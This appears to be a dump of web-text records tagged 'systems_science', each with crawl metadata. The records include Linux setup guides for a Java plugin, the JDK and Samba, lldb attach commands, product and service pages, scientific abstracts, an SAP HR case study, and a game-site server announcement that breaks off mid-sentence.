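criteria = {
    "grid_proximity": np.array([[0.9, 0.7, 0.2], [0.8, 0.6, 0.3], [0.5, 0.4, 0.1]]),
    "gentle_slope":   np.array([[0.2, 0.9, 0.8], [0.4, 0.9, 0.7], [0.6, 0.5, 0.3]]),
}
weights = {"grid_proximity": 0.6, "gentle_slope": 0.4}
excluded = np.zeros((3, 3), dtype=bool)
excluded[0, 2] = True
print(weighted_suitability(criteria, weights, excluded).round(2))
```

In a real study the arrays would come from rasterised spatial datasets, and the weights from stakeholder or regulatory input, but the overlay step itself stays this simple.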
systems_science
https://www.rcmediafreedom.eu/Media-freedom-datasets/Open-Observatory-of-Network-Interference
2023-12-08T09:52:11
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100739.50/warc/CC-MAIN-20231208081124-20231208111124-00746.warc.gz
0.921101
101
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__203825834
en
Since late 2012, OONI has collected millions of network measurements across more than 90 countries around the world, shedding light on multiple cases of network interference. OONI is based on various free software tests which are designed to measure the following: - Blocking of websites - Detection of systems responsible for censorship, surveillance and manipulation - Reachability of Tor, proxies, VPNs, and sensitive domains Data collected by OONI are freely accessible and can be found here.
systems_science
https://heatingsparesltd.com/index.php?route=information/information&information_id=8
2023-02-06T10:14:00
s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764500334.35/warc/CC-MAIN-20230206082428-20230206112428-00299.warc.gz
0.942514
722
CC-MAIN-2023-06
webtext-fineweb__CC-MAIN-2023-06__0__247983075
en
All gas central heating systems using hot water to provide heat produce iron oxides (magnetite) and other debris. It has long been recognised that the presence of these materials within gas central heating systems leads to a drop in heating efficiency and a shorter life for boilers and other components. Carrying out power flushes and adding an inhibitor when a new boiler is fitted are effective ways to minimise this potential problem. Increasingly, fitting a magnetic filtration device to the system is being used to further reduce the risk of on-going damage to central heating systems. Magnetic filters come in two types. Some use magnetic technologies to remove iron oxides only. Others use both magnetic and non-magnetic technologies to remove iron oxides, and non-iron sludge and debris in the water. Manufacturers claim they remove virtually all debris. Typically, magnetic filter devices are fitted to the water return pipe near the boiler itself. Magnetic filters are relatively non-bulky and are easily fitted to either horizontal or vertical pipework. They have no moving parts and an electrical supply is not required. Filters are available to fit either 22mm or 28mm pipes and they are compatible with most gas domestic and commercial central heating systems. Filters should be emptied annually and this can be done as part of the annual service. Emptying is a simple process which can be completed within a few minutes. Fitting a magnetic filter does not significantly impede the flow of water within the system. They are designed so that the flow of water continues even when the filter becomes full, although when full they no longer effectively remove debris from the water. Magnetic filters also provide a convenient point at which to take water samples or add chemicals to the water.
Benefits of Magnetic Filters
By ensuring that the water in gas central heating systems remains clean, magnetic filters offer a number of potential benefits:
- The system continues to operate at a high level of efficiency
- There are no cold spots in the system, for example where a radiator has become clogged with debris
- The lifetime of the system and its components is maximised
- There are fewer repairs and breakdowns
- Carbon emissions are reduced
- Overall maintenance costs are reduced for landlords, and tenants experience lower heating costs
There is limited statistical information on these benefits, although one manufacturer claims that their technology can lead to a reduction in heating energy consumption of 6% per year and a 250kg reduction in carbon emissions each year in a typical three bedroom home.
When to Fit a Magnetic Filter
Whilst there may be some benefits in fitting a magnetic filter to any gas central heating system at any time, the most appropriate time to fit one is when a new boiler or other major components are fitted. In this respect, magnetic filters need to be seen as one part of a more comprehensive approach to reducing the effect of iron oxides and debris in heating systems which includes:
- A power flush to remove any existing dirt in the system
- A chemical inhibitor to reduce the build-up of iron oxides, lime scale and other materials within the system
- A magnetic filter to catch and remove any iron oxide or other debris that forms within the system during its lifetime
Magnetic filters cost around £80 to £140 per unit (unfitted and excluding VAT) depending on the manufacturer.
These costs need to be seen in the context of the cost of a new boiler and the potential for using a filter to extend its life, reduce repairs and lower the rapidly increasing heating costs for homeowners.
systems_science
https://rodush.com/2014/08/27/
2017-09-20T00:14:53
s3://commoncrawl/crawl-data/CC-MAIN-2017-39/segments/1505818686077.22/warc/CC-MAIN-20170919235817-20170920015817-00008.warc.gz
0.733256
483
CC-MAIN-2017-39
webtext-fineweb__CC-MAIN-2017-39__0__142139190
en
By default Firefox has no Java plugin because of security issues. One can install the plugin by following these steps:
0. Exit the Firefox browser if it is running.
1. Make the /usr/lib/mozilla/plugins directory if it does not exist.
2. Make a symbolic link to the libnpjp2.so file, which resides in the JRE directory, e.g.:
sudo ln -s /usr/lib/jvm/jdk1.8.0_20/jre/lib/amd64/libnpjp2.so /usr/lib/mozilla/plugins/libnpjp2.so
Please note that amd64 is the architecture of the OS you have installed; it could be i386 in your case.
3. Start Firefox and type about:plugins in the address box to check whether the browser is able to see the Java plugin.
This is a YAP (yet another post) about how one can manually install Oracle's proprietary JDK/JRE version (in Debian 7.0 Wheezy as an example). First of all, download a fresh version of the JDK/JRE from the Oracle website. Copy the archive to the desired location, which is used as the installation source directory in the following example. Unpack the archive and run the next commands:
sudo update-alternatives --install /usr/bin/java java /usr/lib/jvm/jdk/bin/java 1071
sudo update-alternatives --install /usr/bin/javac javac /media/mydisk/jdk/javac 1071
sudo update-alternatives --install /usr/bin/jcontrol jcontrol /media/mydisk/jdk/bin/jcontrol 1071
You may need to read the man pages for update-alternatives to check out the parameters and what they mean. Now, if you want the freshly installed version of java/javac to be the default in your system, run the next commands:
sudo update-alternatives --config java
sudo update-alternatives --config javac
sudo update-alternatives --config jcontrol
Follow the instructions issued by update-alternatives to select the default version among the list of available installations. After that, check that everything worked by running java -version and javac -version. You should see 1.8.0 for both.
systems_science
https://www.grizzly-hills.com/index.php/2019/11/01/ubuntu-19-10-installing-samba/
2023-10-02T12:21:36
s3://commoncrawl/crawl-data/CC-MAIN-2023-40/segments/1695233510994.61/warc/CC-MAIN-20231002100910-20231002130910-00678.warc.gz
0.777223
579
CC-MAIN-2023-40
webtext-fineweb__CC-MAIN-2023-40__0__282573414
en
Setting up Samba under Ubuntu 19.10 is relatively easy. This guide will show how to install Samba itself, then configure both a public drive meant to be shared among multiple users, and a per-user drive. NOTE: This guide assumes your linux machine is on your local network. First, install both samba and smbclient:
sudo apt install samba smbclient
Next, create a directory that will be the shared public drive, and set its ownership:
sudo mkdir -p /srv/samba/public
sudo chown nobody:nogroup /srv/samba/public
sudo chmod 777 /srv/samba/public
Now it's time to configure Samba. There are two basic things that need to be configured: setting the user security, and adding the public drive. To set the user security, set security = user in the [global] section of /etc/samba/smb.conf.
Enable the per-user drive in [homes]:
comment = Home Directories
browseable = no
read only = no
To add the public drive, add this section to the end of the file:
[public]
comment = Public Files
path = /srv/samba/public
browsable = yes
guest ok = yes
read only = no
create mask = 0755
Now, restart the Samba services to pick up these configuration changes:
sudo systemctl restart smbd.service nmbd.service
Since Samba doesn't use the linux login credentials for a user, you must add each user that needs access to a shared drive using the smbpasswd command:
sudo smbpasswd -a <unix username>
Also, if you're running a firewall on your linux machine, you'll probably have to allow access for your local network. You can allow specific machines, or a subnet. I use ufw to control my firewall configuration, so for me I simply allowed all access for my internal network:
sudo ufw allow from 192.168.0.0/16
To connect to a drive from Windows, I right-click on the Network item in File Explorer and select Map network drive..., and use \\<hostname>\<unix username> as the Folder. To connect to a drive from the Mac, I use Go -> Connect to Server... in the Finder, then use smb://<hostname>/<unix username> as the address.
systems_science
https://atlantconsult.com/experience/reviews/tegeta-motors-hr-system-for-1-5-k-employees-/
2021-11-28T13:57:34
s3://commoncrawl/crawl-data/CC-MAIN-2021-49/segments/1637964358560.75/warc/CC-MAIN-20211128134516-20211128164516-00457.warc.gz
0.897368
1,060
CC-MAIN-2021-49
webtext-fineweb__CC-MAIN-2021-49__0__135466505
en
Tegeta Motors used an employee management system that didn't fit all of its requirements. The company needed new, multifeatured HR software. Together with AtlantConsult, Tegeta Motors solved the issue by implementing SAP SuccessFactors.
Tegeta Motors is the leading company in the automotive industry of Georgia. The company owns about 50% of the market, importing and selling vehicles (cars, trucks, buses) and auto parts. The supplier represents more than 300 brands, to name a few – Shell, MAN, Toyota, Porsche.
2K wholesale companies
10K B2B clients
The human capital management system didn't have enough functions to support all the business needs. It lacked the following settings:
About 1.5K employees worked at Tegeta Motors. Managers needed a system that would lower the working hours spent on extensive data entry into the personnel database. To maintain internal communication, the company required a unified online platform listing employees' positions and contacts.
- Employee Central, which supports core HR processes;
- Performance & Goals, which helps to align the company's strategy and goals and improve employee performance;
- SAP Jam Collaboration - an enterprise social networking solution.
Every employee has a personal profile in the system that includes basic information about them (contacts, bio, position, skills, salary account, driver's license, etc.). Personnel complete their profiles themselves, which streamlines the HR department's work. In the system, users can see the company hierarchy and the structure of each department in accordance with employees' positions.
In Employee Central, staff create requests and address them to the proper managers or colleagues. A request might be an order for equipment or a call for technical support. Previously, employees used to send these by email. Now, all requests are processed in the system.
The Benefits Management section is designed to administer employees' insurance applications and other bonuses (corporate car sharing, holiday gifts, pension contributions). To apply for health insurance, an employee needs to make several clicks and fill in the required data. Earlier, staff used to negotiate it separately with the HR manager and supervisor. The work of the staff specialist is simplified as well: they collect all applications and send them to the insurance company.
Employee Central helps to track employee working hours. The system is synchronized with a key card entry system and collects information on when employees come to the office, take breaks and work after hours. The system registers when a person works on a holiday (according to the working schedule). Thus, the employee is automatically granted compensatory leave for the respective amount of time. The platform keeps track of sick leave, vacation and other types of absence. Employees book the major part of absences in Employee Central themselves and then adjust them with managers. They can see the remaining part of their vacation allowance.
Performance & Goals
The module enables running an annual business plan and tracking the progress of subordinates and managers in achieving goals. Supervisors set goals, tasks and activities for subordinates. The system shows the employee's progress and updates the percent complete.
The interface of goals management in Performance & Goals
SAP Jam Collaboration
The news feed in SAP Jam Collaboration
In the corporate social network SAP Jam, employees follow the company's news and comment on it, and can keep a professional blog.
In the platform, the company's departments, project teams and corporate learning groups can gather in communities. There is an option to share and adjust documents.
The publication of different versions of a file in SAP Jam Collaboration
"SAP Jam is quite helpful for communication on a project. Team members edit project documentation together and save different versions of files. Generally, the vendor SAP recommends carrying out all the project documentation during the implementation of SAP SuccessFactors in SAP Jam Collaboration," commented the project leader Pavel Lobach.
Additional advantages of the SAP SuccessFactors suite concern mobility and outsourced technical support. A user enters the system through a browser or a mobile app. When employees are on the road or on a business trip, they remain reachable and can use the key functions of the system. The SuccessFactors suite doesn't require internal programmers to maintain it; the vendor SAP does this as part of the subscription.
- HR specialists spend less time on data entry, partly delegating it to employees
- HR managers keep staff information in a single system
- The personnel can access the necessary information about colleagues and the structure of the company
- Employees create and save requests in one place
- Executives can set individual goals for each subordinate in accordance with the strategic planning of the company
- Managers can systematically track employees' performance
- The company has a platform for corporate communication
- SuccessFactors is synchronized with an internal ERP system, which enables the use of up-to-date staff information in operational activity
Tegeta Motors plans to embed other SAP SuccessFactors modules:
- Succession Management & Development Planning
- Compensation & Variable Pay
systems_science
https://blakestarnes.com/how-c-contributes-to-artificial-intelligence-and-machine-learning/
2023-09-29T16:30:03
s3://commoncrawl/crawl-data/CC-MAIN-2023-40/segments/1695233510520.98/warc/CC-MAIN-20230929154432-20230929184432-00453.warc.gz
0.915392
1,210
CC-MAIN-2023-40
webtext-fineweb__CC-MAIN-2023-40__0__216034109
en
Artificial Intelligence (AI) and Machine Learning (ML) have become integral parts of our daily lives, from voice assistants like Siri and Alexa to recommendation systems on e-commerce platforms. These technologies have revolutionized various industries, including healthcare, finance, and transportation. Behind the scenes, programming languages play a crucial role in developing AI and ML applications. One such language is C++, which offers several features and advantages that contribute to the success of AI and ML. In this article, we will explore how C++ contributes to AI and ML, examining its performance, efficiency, libraries, and integration capabilities. Performance and Efficiency C++ is known for its performance and efficiency, making it an ideal choice for AI and ML applications. Here are some key reasons why C++ excels in this regard: - Low-level programming: C++ allows developers to write code at a low level, giving them fine-grained control over memory management and resource allocation. This level of control is crucial for optimizing AI and ML algorithms, which often involve complex computations and large datasets. - Compiled language: C++ is a compiled language, meaning that the code is translated into machine-readable instructions before execution. This compilation process allows for efficient execution and eliminates the need for interpretation, resulting in faster performance. - Inline assembly: C++ supports inline assembly, which enables developers to write assembly code directly within their C++ programs. This feature is particularly useful for optimizing critical sections of AI and ML algorithms, where performance is crucial. - Efficient memory management: C++ provides manual memory management through features like pointers and dynamic memory allocation. This control over memory allows developers to optimize memory usage, reducing overhead and improving overall performance. Libraries and Frameworks C++ offers a wide range of libraries and frameworks that facilitate AI and ML development. These libraries provide pre-built functions and algorithms, saving developers time and effort. Here are some popular C++ libraries and frameworks used in AI and ML: - OpenCV: OpenCV (Open Source Computer Vision Library) is a powerful library for computer vision tasks, such as image and video processing. It provides a comprehensive set of functions and algorithms, making it a go-to choice for AI applications that involve visual data. - TensorFlow: TensorFlow is a popular open-source ML framework developed by Google. While primarily written in Python, TensorFlow also provides a C++ API, allowing developers to leverage its capabilities in C++ projects. TensorFlow offers a wide range of tools and functions for building and training ML models. - MLpack: MLpack is a scalable C++ machine learning library that provides a collection of algorithms and tools for ML tasks. It focuses on efficiency and ease of use, making it suitable for both research and production environments. - Dlib: Dlib is a C++ library that offers various machine learning algorithms and tools. It is particularly known for its facial recognition capabilities and is widely used in AI applications that involve face detection and analysis. Integration with Other Languages C++ is often used in conjunction with other programming languages to develop AI and ML applications. Its ability to integrate seamlessly with other languages makes it a versatile choice for building complex systems. 
Here are some examples of how C++ integrates with other languages: - Python: Python is a popular language for AI and ML, thanks to its simplicity and extensive libraries. C++ can be used to write performance-critical parts of an AI or ML system, which can then be called from Python using language bindings or inter-process communication. - Java: Java is widely used in enterprise applications, and C++ can be integrated with Java through technologies like Java Native Interface (JNI). This integration allows developers to leverage the performance benefits of C++ in Java-based AI and ML systems. - R: R is a language commonly used for statistical computing and data analysis. C++ can be used to write custom R packages or extensions, providing performance improvements for computationally intensive tasks in AI and ML. Let’s explore some real-world examples where C++ has played a significant role in AI and ML: - Autonomous Vehicles: Autonomous vehicles rely heavily on AI and ML algorithms to perceive the environment and make decisions. C++ is often used in the development of autonomous vehicle systems due to its performance and efficiency. For example, the Apollo project by Baidu, which aims to build autonomous driving systems, extensively uses C++ for its core algorithms. - Speech Recognition: Speech recognition systems, such as those used in voice assistants, utilize AI and ML techniques to convert spoken language into text. C++ is often used in the development of speech recognition systems to optimize performance and handle real-time processing. For instance, the Kaldi project, a popular open-source speech recognition toolkit, is primarily implemented in C++. - Computer Vision: Computer vision involves analyzing and understanding visual data, such as images and videos. C++ is widely used in computer vision applications due to its performance and the availability of libraries like OpenCV. For example, the OpenPose project, which performs real-time multi-person keypoint detection, heavily relies on C++ and OpenCV. C++ plays a crucial role in the development of AI and ML applications, contributing to their performance, efficiency, and integration capabilities. Its low-level programming features, compiled nature, and efficient memory management make it an ideal choice for optimizing complex algorithms. Additionally, the availability of libraries and frameworks like OpenCV, TensorFlow, MLpack, and Dlib further enhances C++’s capabilities in AI and ML development. The ability to seamlessly integrate with other languages like Python, Java, and R expands the possibilities of building complex AI and ML systems. As AI and ML continue to advance, C++ will remain a valuable tool for developers in pushing the boundaries of these technologies.
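As a brief, hedged illustration of the Python-integration point made earlier (calling performance-critical C++ from Python via language bindings), the sketch below uses ctypes; the shared library fastml.so and the function dot_product are hypothetical and not part of any project named above.

# Hypothetical example: calling a C++ routine (compiled into fastml.so and
# exported with extern "C" linkage) from Python via ctypes. The library name
# and function are made up for illustration; neither is a real project API.
import ctypes

lib = ctypes.CDLL("./fastml.so")            # load the compiled C++ shared library
lib.dot_product.restype = ctypes.c_double   # double dot_product(const double*, const double*, int)
lib.dot_product.argtypes = [ctypes.POINTER(ctypes.c_double),
                            ctypes.POINTER(ctypes.c_double),
                            ctypes.c_int]

def dot(xs, ys):
    """Marshal two Python lists into C arrays and call the native routine."""
    n = len(xs)
    ArrayType = ctypes.c_double * n
    return lib.dot_product(ArrayType(*xs), ArrayType(*ys), n)

# print(dot([1.0, 2.0, 3.0], [4.0, 5.0, 6.0]))  # would print 32.0 if fastml.so existed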
systems_science
https://bristolfoodpolicycouncil.org/reframing-the-foodscape-the-emergent-world-of-urban-food-policy/
2023-10-04T02:40:43
s3://commoncrawl/crawl-data/CC-MAIN-2023-40/segments/1695233511351.18/warc/CC-MAIN-20231004020329-20231004050329-00250.warc.gz
0.935062
241
CC-MAIN-2023-40
webtext-fineweb__CC-MAIN-2023-40__0__89891846
en
by Ana Moragues-Faus, Kevin Morgan: Abstract. Cities are becoming key transition spaces where new food governance systems are being fashioned, creating ‘spaces of deliberation’ that bring together civil society, private actors, and local governments. In order to understand the potential of these new urban food policy configurations, this paper draws on urban political ecology scholarship as a critical lens to analyse governance-beyond-the-state processes and associated postpolitical configurations. Taking Bristol and Malmö as empirical case studies, the paper illustrates the different paths that cities are taking as they strive to fashion more sustainable urban foodscapes. The analysis highlights the contested nature of “sustainability” in transition studies and explores whether concerted action on the part of civil society and municipal government is capable of creating more inclusive food narratives. Although progressive political currents can be neutralised by incumbent elites, as theorists of the ‘postpolitical city’ have argued, these cities also show that the food system is a highly contested battleground in which the themes of sustainability and justice can help to mobilise progressive forces and open up a range of new political possibilities. You can access the full report here.
systems_science
https://www.pdmitoquant.eu/publications/
2020-12-05T07:45:29
s3://commoncrawl/crawl-data/CC-MAIN-2020-50/segments/1606141747323.98/warc/CC-MAIN-20201205074417-20201205104417-00694.warc.gz
0.853503
487
CC-MAIN-2020-50
webtext-fineweb__CC-MAIN-2020-50__0__122180196
en
Mitochondrial clusters are found at regions of high energy demand, allowing cells to meet local metabolic requirements while maintaining neuronal homeostasis. AMP-activated protein kinase (AMPK), a key energy stress sensor, responds to increases in AMP/ATP ratio by activating multiple signalling cascades to overcome the energetic deficiency. In many neurological conditions, the distal axon experiences energetic stress independent of the soma. Here, we used microfluidic devices to physically isolate these two neuronal structures and to investigate whether localised AMPK signalling influenced axonal mitochondrial transport. Nucleofection of primary cortical neurons, derived from E16 mouse embryos (both sexes), with mito-GFP allowed monitoring of the transport dynamics of mitochondria within the axon, by confocal microscopy. Pharmacological activation of AMPK at the distal axon (0.1 mM AICAR) induced a depression of the mean frequency, velocity and distance of retrograde mitochondrial transport in the adjacent axon. Anterograde mitochondrial transport was less sensitive to local AMPK stimulus, with the imbalance of bi-directional mitochondrial transport resulting in accumulation of mitochondria at the region of energetic stress signal. Mitochondria in the axon-rich white matter of the brain rely heavily on lactate as a substrate for ATP synthesis. Interestingly, localised inhibition of lactate uptake (10 nM AR-C155858) reduced mitochondrial transport in the adjacent axon in all parameters measured, similar to that observed by AICAR treatment. Co-addition of compound C restored all parameters measured to baseline levels, confirming the involvement of AMPK. This study highlights a role of AMPK signalling in the depression of axonal mitochondrial mobility during localised energetic stress. As the main providers of cellular energy, the dynamic transport of mitochondria within the neuron allows for clustering at regions of high energy demand. Here we investigate whether acute changes in energetic stress signal in the spatially isolated axon would alter mitochondrial transport in this local region. Both direct and indirect activation of AMP-activated protein kinase (AMPK) isolated to the distal axon induced a rapid, marked depression in local mitochondrial transport. This work highlights the ability of acute localised AMPK signalling to affect mitochondrial mobility within the axon, with important implications for white matter injury, axonal growth and axonal degeneration.
systems_science
http://debugging-with-lldb.blogspot.com/2013/07/lldb-starting-or-attaching-to-your.html
2019-04-25T22:54:29
s3://commoncrawl/crawl-data/CC-MAIN-2019-18/segments/1555578742415.81/warc/CC-MAIN-20190425213812-20190425235812-00456.warc.gz
0.901237
304
CC-MAIN-2019-18
webtext-fineweb__CC-MAIN-2019-18__0__67689904
en
To launch a program in lldb we use the "process launch" command or one of its built-in aliases:
(lldb) process launch
You can also attach to a process by process ID or process name. When attaching to a process by name, lldb also supports the "--waitfor" option which waits for the next process that has that name to show up, and attaches to it:
(lldb) process attach --pid 123
(lldb) process attach --name Sketch
(lldb) process attach --name Sketch --waitfor
After you launch or attach to a process, your process might stop somewhere:
(lldb) process attach -p 12345
Process 46915 Attaching
Process 46915 Stopped
1 of 3 threads stopped with reasons:
* thread #1: tid = 0x2c03, 0x00007fff85cac76a, where = libSystem.B.dylib`__getdirentries64 + 10, stop reason = signal = SIGSTOP, queue = com.apple.main-thread
Note the line that says "1 of 3 threads stopped with reasons:" and the lines that follow it. In a multi-threaded environment it is very common for more than one thread to hit your breakpoint(s) before the kernel actually returns control to the debugger. In that case, you will see all the threads that stopped for some interesting reason listed in the stop message.
systems_science
https://telecomunlimited.com/access-control/
2024-03-03T13:12:38
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947476374.40/warc/CC-MAIN-20240303111005-20240303141005-00561.warc.gz
0.941505
165
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__164669296
en
Telecom Unlimited provides IP-based door access control systems that allow authorized employees quick and convenient access to facilities, while at the same time restricting access to unauthorized people. A major benefit of access control is not having to re-key locks due to employee turnover, as access is controlled by rules configured in a server, which may be modified on a moment’s notice. We will custom-design your system based on requirements that will be identified with a site walk-through. Specifically, we will determine the most practical hardware based on door types, door quantity, reader requirements (HID, touchpad), and emergency egress requirements. These systems may be as simple as a single door at one site, or hundreds of doors covering multiple locations. The goal is to create a safe environment with an easily managed system.
systems_science
https://www.agropolis-kinrooi.be/en/projects/precision-agriculture/
2024-03-02T07:02:32
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947475757.50/warc/CC-MAIN-20240302052634-20240302082634-00493.warc.gz
0.934462
462
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__6261257
en
Here at Agropolis, we also work hard at our very own project: precision agriculture, a project sponsored by the Flemish Land Agency (VLM) and the Province of Limburg. Curious to find out what exactly this project entails? Find out here! Added ECO² value through precision demo Our precision agriculture project is financed by the Flemish Land Agency and the Province of Limburg. As part of the project, we are delving deeper into an area that has remained relatively unexplored so far together with PIBO Campus, PVL and the Agropolis Machinery Cooperative. “Precision agriculture involves looking for solutions to close the gap between what needs to be done on the field and the technologies we have access to nowadays. In doing so, the most important things are to take stock of what farmers need, and to map the technologies that are available. To name just one example, precision agriculture is making it possible to use technology for weed control. Using the appropriate equipment, we take a picture of the field and map the entire area. In doing so, we can identify the exact amount of weeds, and we can start protecting our crops in a highly targeted manner. We then use GPS systems to determine the exact driving lines. This also allows us to avoid overlaps with great precision, meaning resources are used much more efficiently and in a much more targeted way. And that has a positive impact on both quality and quantity”, Agropolis’ Kristof Das explains. “Aside from working more efficiently, working comfort is also improved. The huge number of hectares that would need to be checked on a regular basis are reduced to just a few hectares. This combination has led us to strongly believe that there is a genuine future for precision agriculture. Many farmers remain relatively unfamiliar with the concept, but this project aims to change that! We intend to do so using demos and workshops, both at Agropolis and on location.” “The techniques we discover while researching precision agriculture can be acquired by the machinery cooperative, removing any obstacles that might otherwise prevent our members from getting to explore precision agriculture. By using the scale of the cooperative (approx. 75 members), the individual cost for each farmer can be reduced”, according to Kristof.
systems_science
https://psirep.com/products/act-thermal-technical-services
2023-03-22T12:29:42
s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943809.76/warc/CC-MAIN-20230322114226-20230322144226-00373.warc.gz
0.904154
660
CC-MAIN-2023-14
webtext-fineweb__CC-MAIN-2023-14__0__143529910
en
ACT offers a complete range of thermal engineering services – everything from initial concept generation to product design to high volume production of a fully integrated thermal management solution – and everything in-between. We're committed to serving our customers by providing the services they truly need. Our experienced engineering team and leading edge technology developers enable us to offer a broad range of services at a consistently high quality level. Further, because we operate under an efficient, disciplined program management structure, we can offer these services at very competitive prices. In all cases, we maintain strict confidentiality to protect our customers' valuable information. We offer a variety of Thermal Management Products and Services including:
THERMAL MANAGEMENT CONSULTING
ACT's thermal engineering experts have helped guide clients in the military, telecommunications, medical equipment, manufacturing and aerospace industries to a variety of effective and cost-effective thermal solutions. Using our extensive product development and manufacturing experience, we offer feasibility studies to generate and evaluate potential thermal management solutions from many important aspects including: cost, performance, manufacturability and reliability. We can help you save time and avoid costly delays at the end of your project by identifying the correct thermal solution up front. We can do a trade study to determine which of multiple potential thermal solutions offers the best performance and value.
DESIGN AND ANALYSIS
ACT has a staff of thermal engineers who are fully competent in both CFD (Computational Fluid Dynamics) and heat transfer analysis. Our thermal engineers are fluent in commercial software packages and can also create or modify computational codes as required. ACT's thermal engineering professionals have simulated thermal phenomena at all length scales, including the atomic (Ab Initio, Molecular Dynamics), microscopic (Boltzmann Transport Equation, Phase Field Modeling) and macroscopic (CFD, FEA). ACT also develops custom codes for analyses involving multiple phases and components, including: heat pipes, heat sinks, vapor chambers, two phase boiling flows, thermal storage using Phase Change Materials and chemical reaction mechanisms. Whether it's a simple heat sink extrusion or a high heat flux pumped two phase loop, our engineers can design and specify a solution that is appropriate for your project and budget.
Along with our in-house volume manufacturing, we offer custom thermal management component and system prototyping. We offer high quality, fast turnaround on heat pipes and vapor chambers, as well as full solutions including integration with thermoelectric coolers, power electronics, laser devices, etc. Along with passive thermal solutions such as heat pipes and phase change materials, ACT also builds thermal storage devices, pumped liquid and two phase systems.
ACT has in-house volume manufacturing operations that are certified under ISO9001:2008 and AS 9100 C quality standards. We have a heat pipe manufacturing line that produces >250,000 heat pipes annually, which are then integrated into a variety of thermal management devices for military, aerospace, and commercial applications. Our laboratory includes a host of testing and characterization equipment, from standard data acquisition systems to high temperature and high heat flux testing metrology equipment. Our experienced, quality-conscious technicians ensure all testing is performed in accordance with industry standards.
systems_science
http://ilevbare.com/pneumatic-load-cell-principle/
2018-09-19T13:21:30
s3://commoncrawl/crawl-data/CC-MAIN-2018-39/segments/1537267156224.9/warc/CC-MAIN-20180919122227-20180919142227-00253.warc.gz
0.902235
324
CC-MAIN-2018-39
webtext-fineweb__CC-MAIN-2018-39__0__1148768
en
Principle of Pneumatic Load Cell
If a force is applied to one side of a diaphragm and an air pressure is applied to the other side, some particular value of pressure will be necessary to exactly balance the force. This pressure is proportional to the applied force.
Pneumatic Load Cell
The main parts of a pneumatic load cell are as follows:
- A corrugated diaphragm with its top surface attached with arrangements to apply force.
- An air supply regulator, nozzle and a pressure gauge arranged as shown in the figure.
- A flapper arranged above the nozzle as shown in the figure.
Operation of Pneumatic Load Cell
The force to be measured is applied to the top side of the diaphragm. Due to this force, the diaphragm deflects and causes the flapper to shut off the nozzle opening. Now an air supply is provided at the bottom of the diaphragm. As the flapper closes the nozzle opening, a back pressure results underneath the diaphragm. This back pressure acts on the diaphragm, producing an upward force. The air pressure is regulated until the diaphragm returns to the pre-loaded position, which is indicated by air escaping from the nozzle. At this stage, the corresponding pressure indicated by the pressure gauge becomes a measure of the applied force when calibrated.
- The pneumatic load cell can measure loads up to 2.5*10^3 kgf.
- The accuracy of this system is 0.5 percent of the full scale.
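As a rough worked example of this force-balance principle (not taken from the original text), the balancing pressure follows from pressure = force / effective diaphragm area; the load and area values below are assumptions chosen only for illustration.

# Rough worked example of the pneumatic load-cell balance principle.
# The diaphragm area and applied load below are assumed values for illustration.
G = 9.80665  # standard gravity, m/s^2

def balancing_pressure(load_kgf, diaphragm_area_m2):
    """Pressure (Pa) needed to balance a load, assuming P = F / A on the diaphragm."""
    force_n = load_kgf * G              # convert kgf to newtons
    return force_n / diaphragm_area_m2

# e.g. a 500 kgf load on an assumed effective diaphragm area of 0.01 m^2
print(balancing_pressure(500, 0.01) / 1e5, "bar")   # about 4.9 bar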
systems_science
https://www.hytekgb.com/international-products/international-fuel-management
2018-03-21T22:18:20
s3://commoncrawl/crawl-data/CC-MAIN-2018-13/segments/1521257647706.69/warc/CC-MAIN-20180321215410-20180321235410-00366.warc.gz
0.929503
370
CC-MAIN-2018-13
webtext-fineweb__CC-MAIN-2018-13__0__32455459
en
Hytek have been supplying fuelling equipment for over 32 years & fuel management systems for the past 17. As with all of Hytek's products, the FC10 fuel management system has evolved & comes with web based software, allowing data to be securely accessed from any PC around the world. This automated fuel management system is ideal for small or large fleets, multi-site & multi-user applications. The FC10 fuel management system is our own Hytek Engineered ALPHA pump with an integral fuel management system. We have added to our fuel management solutions with our FC20, a standalone system that can either be floor standing or wall mounted to a tank, & is able to be connected to up to 4 new or 4 pre-existing pumps. Our fuel management solutions are all housed in stainless steel cabinets, enabling them to work in the harshest of environments from coastal locations to harsh sun burnt quarries, providing a 100% rust free future & come with indestructible data tags instead of keys or cards. The flexible report writer on our fuel management systems enables you to access a wide range of fuel usage analysis by vehicle, fuel type, time, department, KM/L & CO2 output. By adding an OLE gauge interfaced through the fuel management software, a 'LIVE' tank consumption monitoring feed enables readings to be viewed & monitored from the comfort of the office via the web-based software. This generates an early warning in the event of a tank leakage, as well as email & visual stock alerts when stock is running low. The software automatically logs fuel stock deliveries & saves time, as there is no need to go out to the tank for a visual check of the tank gauges. All of these features can be monitored from your phone, tablet or computer anywhere in the world.
systems_science
http://runetrack.com/forums/viewtopic.php?p=717
2017-04-26T13:43:47
s3://commoncrawl/crawl-data/CC-MAIN-2017-17/segments/1492917121355.9/warc/CC-MAIN-20170423031201-00554-ip-10-145-167-34.ec2.internal.warc.gz
0.976713
466
CC-MAIN-2017-17
webtext-fineweb__CC-MAIN-2017-17__0__168110569
en
I'm happy to announce that RuneTrack has now moved to a faster, more reliable server with significantly increased uptime! I'm aware that for the past couple months, the server has been continually sluggish from around 9:30am - 11:30am GMT. This downtime did not affect the majority of RuneTrack's users as it was during the early morning for those in the United States (5:30am - 7:30am Eastern US) and at about mid-day for Europeans. However, the downtime was unfortunately an issue for those in Australia, as it occurred during their peak playing hours in the evening (7:30pm - 9:30pm AEST). Additionally, other server slow-downs were causing minor errors to occur during some of the daily System Updates (though these were quickly fixed the next day). So, in order to maintain RuneTrack's quick and efficient services, I have now moved RuneTrack.com to a new, more reliable server, which has fully solved the downtime issue. I apologize for any trouble this downtime issue may have caused, but after extensive monitoring of the server, I'm happy to report that RuneTrack.com is now running at virtually 100% uptime for all timezones. Furthermore, the server move has fixed those minor errors during system updates, such that all aspects of the daily System Update now function exactly as they should. Additionally, the server move has also provided the site with a speed boost to allow for faster load times overall, as can be seen in an updated version of the Load Speed Improvement Chart (first used in the April 2, 2010 news post) below: Note: Average load time refers to the 